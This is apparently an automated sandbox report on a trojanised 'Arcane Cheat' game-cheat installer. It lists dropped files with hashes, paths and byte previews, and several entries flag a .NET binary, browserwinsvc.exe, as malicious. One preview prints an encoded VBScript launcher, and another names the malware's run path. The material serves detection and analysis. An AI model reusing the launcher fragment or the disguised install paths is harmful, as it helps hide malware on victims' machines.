                                MD5:0A79304556A1289AA9E6213F574F3B08
                                SHA1:7EE3BDE3B1777BF65D4F62CE33295556223A26CD
                                SHA-256:434E57FFFC7DF0B725C1D95CABAFDCDB83858CCB3E5E728A74D3CF33A0CA9C79
                                SHA-512:1560703D0C162D73C99CEF9E8DDC050362E45209CC8DEA6A34A49E2B6F99AAE462EAE27BA026BDB29433952B6696896BB96998A0F6AC0A3C1DBBB2F6EBC26A7E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):13202
                                Entropy (8bit):7.737712617961208
                                Encrypted:false
                                SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):106006
                                Entropy (8bit):7.823795646704166
                                Encrypted:false
                                SSDEEP:1536:CPj4aLCBcnn4xGrpR7H30x4VTNVNM43QHt0msLiWzO5SQJn4494m75CYl3U:ETCBmnoCptBNNVNzQ6e5SQW494mlZ2
                                MD5:0C8768CDEB3E894798F80465E0219C05
                                SHA1:C4DA07AC93E4E547748ECC26B633D3DB5B81CE47
                                SHA-256:15F36830124FC7389E312CF228B952024A8CE8601BF5C4DF806BC395D47DB669
                                SHA-512:35DB507A3918093B529547E991AB6C1643A96258FC95BA1EA7665FF762B0B8ABB1EF732B3854663A947EFFE505BE667BD2609FFCCCB6409A66DF605F971DA106
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17374
                                Entropy (8bit):7.682654493549437
                                Encrypted:false
                                SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:InnoSetup Log Arcane Cheat {1abcb2b3-469c-4b18-82f8-f208926ef299}, version 0x418, 37183 bytes, 960781\37\user\376, C:\Program Files (x86)\Arcane Cheat\376\37
                                Category:dropped
                                Size (bytes):37183
                                Entropy (8bit):3.4135046145445984
                                Encrypted:false
                                SSDEEP:192:W4LkT6lP1gwf1w121HPHGsArY1pMYosZ9HI:W4M6x+4vHGr6MYNHI
                                MD5:71FEB977FFAC7DC8F51481CD3EF49CFE
                                SHA1:A9153E38DDADF5E4362A24AC362B101674A643CD
                                SHA-256:03FCF6500DC644852E8C6E30B96B130554DD70DB6004841BD19C3E80CE3C3C2D
                                SHA-512:8EC4A5215479CFAAFF84302B9A656EC8691882FF5E9926F05127D21AD0E5809B8D7D5831D014095F635F896B1C964D4F809923F5D3A631D7D158C099647AAA2A
                                Malicious:false
                                Preview:Inno Setup Uninstall Log (b)....................................{1abcb2b3-469c-4b18-82f8-f208926ef299}..........................................................................................Arcane Cheat............................................................................................................................?...%...............................................................................................................a.q..........a................9.6.0.7.8.1......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t....................*.. ........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t..~...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.A.r.c.a.n.e. .C.h.e.a.t......A.r.c.a.n.e. .C.h.e.a.t......e.n.g.l.i.s.h.............L........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.................C.:.\.P.r.o.g.r.
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1197769
                                Entropy (8bit):6.370122940595945
                                Encrypted:false
                                SSDEEP:24576:eEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyxe:DdmbjTKlD00R5
                                MD5:4814AD2A8419A2C574930F6D70B6F76F
                                SHA1:DD09A6C66B6AE9F3194BE22A13FD353F020D809F
                                SHA-256:D51C94FA83722B0DD27869ECF539DA3E4A9DC4D6C30B01CCD6A2F37C632F17E2
                                SHA-512:4DAE11B817CA9529859E2A15DE0A8B7C7B3CC6A5572026A3C707505938F3374ACF522EC925EFBE0782CCB325BC6683E1111A21FDB1E21CB7C4FD6BE9323D784A
                                Malicious:false
                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..........................................@..............................................@..............................,8... ..............................................................................|................................text...$........................... ..`.itext.. ........................... ..`.data...<0.......2..................@....bss.....a...P...........................idata..,8.......:..................@....tls....<............X...................rdata...............X..............@..@.rsrc........ .......Z..............@..@....................................@..@........................................................................................................................................
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (876), with no line terminators
                                Category:dropped
                                Size (bytes):876
                                Entropy (8bit):5.8980160910325115
                                Encrypted:false
                                SSDEEP:24:ARM+73l29eiDI5jDFhAteStFSVJKMtAbqHw6G2+:U709TWD5St4HKiA+Q6m
                                MD5:30171A5298B350B8C2839982AFDD5C7C
                                SHA1:2B52373ECE3734BE3E0DD4ACC9C5E2B7E93573BC
                                SHA-256:B05088755A21698AB63371B3A1FA17AE7403822551F672FF5183BF43E00A4BE8
                                SHA-512:37E8692EA0B1CB09BE4809FACDA0BF1C689F6F5E9B63B2879ACCB5F78402C7217AE80ABA7118FF967C7B3CE48572CDA1929F0B5C44E9E5AA0A8FC3D96C7C67D7
                                Malicious:false
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun May 26 07:02:28 2024, mtime=Sun May 26 07:02:28 2024, atime=Mon May 20 03:42:10 2024, length=32768, window=hide
                                Category:dropped
                                Size (bytes):1146
                                Entropy (8bit):4.6016896204196245
                                Encrypted:false
                                SSDEEP:24:8m1GELdOEm7KWqcPAuDgFRwd9YUd9oUUx80C0VqyFm:8m15LdOD2u0RwdrdX23syF
                                MD5:F511BD3D70BE2CE2088466447C8892A5
                                SHA1:833F88377839F109C67CAED5D278A6394CD1936F
                                SHA-256:7D93DE6965888AD5FE0B4AF66924645AD0B91976495A189C4B4D48729A93F412
                                SHA-512:113A53A7049694514F6F2410ACA3B878720D8EC3C53F10E7D1670500FB6593A17094FE1D24837AAAB422177447C05E26BD21BE40FAE26A1E40C953FA96B11DCE
                                Malicious:false
                                Preview:L..................F.... ...W...C...W...C.....o.p................................P.O. .:i.....+00.../C:\.....................1......X<@..PROGRA~2.........O.I.X<@....................V.....c.'.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....b.1......XO@..ARCANE~1..J......XO@.XO@.........................9...A.r.c.a.n.e. .C.h.e.a.t.....n.2......XE% .ARCANE~1.EXE..R......XO@.XO@....i.........................A.r.c.a.n.e. .C.h.e.a.t...e.x.e.......c...............-.......b...........]g.<.....C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe..C.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.\.A.r.c.a.n.e. .C.h.e.a.t...e.x.e.#.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.........*................@Z|...K.J.........`.......X.......960781...........hT..CrF.f4... .55.J6....,.......hT..CrF.f4... .55.J6....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (861), with no line terminators
                                Category:dropped
                                Size (bytes):861
                                Entropy (8bit):5.906597424475597
                                Encrypted:false
                                SSDEEP:24:HSKNCF6XGiQHpc6XiB2LrzM680kIgp3tfn:y4CFkT34L068qgp3tf
                                MD5:E3293DE211415A796503DEF0493BBBCC
                                SHA1:B63004D93FECD5609E2C38E3BD0D8B75D62F6061
                                SHA-256:0116E05D705A606F746E4D440ECD66F949DE3126A25571B520AF5AF70AA955BF
                                SHA-512:1210EFE06C1DAABE40A6264A70B96805EB08A63B56017AD0012BD9D3518F7A58D1BB3C1C5883D110BA75B8401A8411A7AC995D119813DCA843C7DD9392006D01
                                Malicious:false
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):145
                                Entropy (8bit):5.6866900422055355
                                Encrypted:false
                                SSDEEP:3:SUOvrMYdMLnbAiAu9R1baUhh4F8XDrtlks0lX3EcArd:SUQwbguXc+RvtOs0lExrd
                                MD5:11EE9C9361D0F55125C5BD0AC2EAF92F
                                SHA1:B0F3D95B0814A7E2DCD23F826C76438A3BAA4704
                                SHA-256:41AD5433BE785C4F0F66B0D6B1364AEC353FFBE4988B32709A2D8F8821A8C164
                                SHA-512:9F4044FDA1133B41B247ABF5CAA85266FEF418936CCED91C96215879FD7D3D26E07FC356C3BE23E1EE8C39477127FECA9463A8D55E0625520A58013F02105F87
                                Malicious:false
                                Preview:dgNqWb7OqIFEnQeCeobbVWkkvLgxiiauvsBAKctA8GxfuYKL3GhwKXwG6n5K4JpHrVT4Pe1C5bdOiFzXBV3cAnjX54DhgiFybqxZFP6YOf1t4hi1xiJjQNHEv59UaUfXVpx2RaRwZeNev0dXW
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (519), with no line terminators
                                Category:dropped
                                Size (bytes):519
                                Entropy (8bit):5.8757528514391515
                                Encrypted:false
                                SSDEEP:12:aCEwHgOOO/hIu1X/VKUIZgVLD8/LnmmQ0GXXR1kT8lE:aAOO/hIu1XsUIZugnmr3E8lE
                                MD5:64B274861D8AB080E98C873F54BF6643
                                SHA1:971335A8AB37C8315FB9887ED4280E978BB319E7
                                SHA-256:5E370829C64D9120C93945CED676639EBB4DC51678058A2FABAFF190DA414A10
                                SHA-512:616064F4519CD3448732AEA0D0320175ABB8EC30B51D996CBF5A476F583144CBA3325C7088BE35AFFC333ABDCF8336BC6B513ED65DFD5259505E98660F58C19B
                                Malicious:false
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):63
                                Entropy (8bit):4.17923012413732
                                Encrypted:false
                                SSDEEP:3:I5nX6Aj2AjcMbKTGJH:Itug+wH
                                MD5:6DE687CF7CA366429C953CB49905B70A
                                SHA1:58E2C1823C038D8DA8A2F042672027184066279E
                                SHA-256:80D02A1CB8E68FFBC609A6C4914600604153CE929D46994200F837D354A5A611
                                SHA-512:6BFA7A07D6ADF167458CECE0BA3A110479EE7677FEB58C0AE9BA5C8913BCDDA13664060CE0261ABC1668C18831D5C73F6BC570BE8595323D46704B810FC024EF
                                Malicious:false
                                Preview:"C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (951), with no line terminators
                                Category:dropped
                                Size (bytes):951
                                Entropy (8bit):5.900282104754012
                                Encrypted:false
                                SSDEEP:24:qfx8x37SJK3nN566k4KNB3o0Ep7aUSU2L1LA1UVv7cl:DlOJON566kp6XxaUSUe101UCl
                                MD5:6E888483AE58D680A742046C8F2D7108
                                SHA1:12A3321C1466D72C4E7E04E25CB4D0AC2D18FDE5
                                SHA-256:70584B50B66250BCF7CB84DDE7B82128FFFCF2AF5A87FB6ED08681E4A6134359
                                SHA-512:F542A5CB0B33A1720CC01699392E541F8B6AE557F737A215A374B2210DB48C95EA1F3DF3278021603EC1835560B1A8AF94C10404D090A294AE80FA2AAF87C0D8
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):241
                                Entropy (8bit):5.8687217902575695
                                Encrypted:false
                                SSDEEP:6:GogwqK+NkLzWbHa/818nZNDd3RL1wQJRXRg6Fdhm0SR/DGkM:GyMCzWLaG4d3XBJpC6nOnM
                                MD5:3944FF0B2B8A1617F5E571EBC259A0E6
                                SHA1:17137E6CCD0437ADECB866E9B44F94CEBBBDD878
                                SHA-256:693C79DBD630E1180DDB96B8D51895A9F27A01AE25C27AEBBC55BE5E4874335D
                                SHA-512:0E76C530E8739F559989E3657ED06A91D121BA37DC18D15C2FECA9AC986BAD1ADCFC6E86D54B097483F08C8BFD890079280C46029F71707C02D02AF96D767B03
                                Malicious:false
                                Preview:#@~^2AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ?;MDKolD+a.W7k[+MmGhaWx.UYk+/krGxsW.kOW.&(L.N4i0It/{;|y2[;Cnn7..9 (lDJ~,!B~0mVd++kcAAA==^#~@.
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun May 26 07:02:28 2024, mtime=Sun May 26 07:02:47 2024, atime=Mon May 20 03:42:10 2024, length=32768, window=hide
                                Category:dropped
                                Size (bytes):1128
                                Entropy (8bit):4.604940247980804
                                Encrypted:false
                                SSDEEP:24:8mHLE7bdOE57KWqcPAuDgRd9YUd9oUUx80C0VqyFm:8mHoXdOs2uYdrdX23syF
                                MD5:885766DF07146400BB5190D5E2E56331
                                SHA1:1F24BC1E4B43D4097BDC1221C79914C2BEEDC55E
                                SHA-256:C43A44555EE43AA3FED11EE6874D7B57F788FF2654708BAE87CFE332D452E724
                                SHA-512:880AE5C71B565DA84D8D1E3129F7ECEDB76ACC36C4E6BADD80344FA5A197D8664247839AF9AFEFF2EF4EABAC97597323DCF8263689CFE60E610F879807ECCB47
                                Malicious:false
                                Preview:L..................F.... ...W...C...G...C.....o.p................................P.O. .:i.....+00.../C:\.....................1......XO@..PROGRA~2.........O.I.XX@....................V......;..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....b.1......XX@..ARCANE~1..J......XO@.XX@.........................W...A.r.c.a.n.e. .C.h.e.a.t.....n.2......XE% .ARCANE~1.EXE..R......XO@.XO@....i.........................A.r.c.a.n.e. .C.h.e.a.t...e.x.e.......c...............-.......b...........]g.<.....C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe..:.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.\.A.r.c.a.n.e. .C.h.e.a.t...e.x.e.#.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.........*................@Z|...K.J.........`.......X.......960781...........hT..CrF.f4... .55.J6....,.......hT..CrF.f4... .55.J6....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8
                                Process:C:\Windows\addins\audiodg.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1281
                                Entropy (8bit):5.370111951859942
                                Encrypted:false
                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1830
                                Entropy (8bit):5.3661116947161815
                                Encrypted:false
                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpBGqZ8
                                MD5:498D8CC0F157AA5168D6679E694BD803
                                SHA1:05A8C750A8FC7F3438945EC9607C4F240917C31B
                                SHA-256:5A452026BD10A826A716DD6A5B5D7D731458217CD89CD9F24FFC5A52AE6CD35F
                                SHA-512:9924A15F7EC4B178E0C7B2BA6CDA7D26787372E63C49B66019D13696C14BFA3AADD2A597416E3589CE8B3F6AB4C9EE32A8BAA7C66ADDEA7A09C78B90B33CC893
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                Process:C:\Recovery\explorer.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1281
                                Entropy (8bit):5.370111951859942
                                Encrypted:false
                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:NlllulJnp/p:NllU
                                MD5:BC6DB77EB243BF62DC31267706650173
                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                Malicious:false
                                Preview:@...e.................................X..............@..........
                                Process:C:\Users\user\Desktop\uChcvn3L6R.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1771706
                                Entropy (8bit):7.170972177500406
                                Encrypted:false
                                SSDEEP:24576:L2G/nvxW3WQgkxKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+Gf:LbA3Nx0Xexpx5LkzQ9lT1NJDruTo
                                MD5:593631A643AA6AB0AF08189773812E6D
                                SHA1:6004DFE157F5BE08B4591819BC7F76B5B12A08D9
